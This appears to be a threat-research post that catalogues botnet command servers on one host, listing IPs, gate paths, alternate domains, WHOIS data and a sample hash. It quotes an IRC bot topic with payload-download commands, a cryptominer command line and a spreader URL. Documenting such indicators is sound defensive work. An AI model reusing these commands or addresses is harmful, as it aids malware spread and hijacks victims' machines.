alibabahost.com

sinsec.net (Betabot http botnet hosted by alibabahost.com)

Resolved sinsec.net to 37.221.170.96
Server: sinsec.net
Gate file: /turndown/order.php
Alternate domains:
divinestresser.info
radicalpkz.com
perp.pw
thefox.pw
uploadme.pw
perp.se
Domain info: sinsec.net
Domain Name: SINSEC.NET
Registry Domain ID: 1814650535_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2013-07-12 10:27:24Z
Creation Date: 2013-07-12 17:27:00Z
Registrar Registration Expiration Date: 2014-07-12 17:27:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48

haveityourway.pw (betabot http botnet hosted by Alibabahost.com)

Resolved haveityourway.pw to 103.31.187.77
Server: haveityourway.pw
Gate file: /members/order.php
Alternate domains (currently not registered):
thebestway42.pw
itsoktohaveityourway.com
losmejoresburgers1.com
The first domain was only registered yesterday.
Hosting infos: http://whois.domaintools.com/103.31.187.77
Related md5s (Search on Malwr.com to download samples)
Betabot: 3b0907c7bf881f8f5f9fa2190384d3dd

kankarmz.ru (betabot http botnet hosted by Alibabahost.com)

Resolved kankarmz.ru to 37.221.170.35
Server: kankarmz.ru
Gate file: /Duf67/H8938_827.php
Alternate domains (both are currently unregistered):
u023sjasj.net
iodijsakj.net
This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid.
Hosting infos:

solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)

Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Gate file: /pages/image.php
There is also a betabot hosted on the same domain.
Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x
Hosting infos: http://whois.domaintools.com/109.163.233.107

solutionswiki.com (Betabot http botnet hosted by alibabahost.com)

Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Port: 4137
Gate file: /system/order.php
I don’t know why betabot owners keep putting their http servers on ports other than 80. Seems pretty dumb. I guess you can only expect so much from a HF bot and its owners.
Hosting infos: http://whois.domaintools.com/109.163.233.107

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208
Server: x01bkr2.biz
Port: 4723
Channel: #o.O
Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd
Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013
The Skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg
Alternate domains:
zr0x1b9.biz
xkzykxb.biz
xeyaz.biz
Hosting infos: http://whois.domaintools.com/94.242.237.128
Hosting infos: http://whois.domaintools.com/37.221.170.208
EDIT: snk is now desperately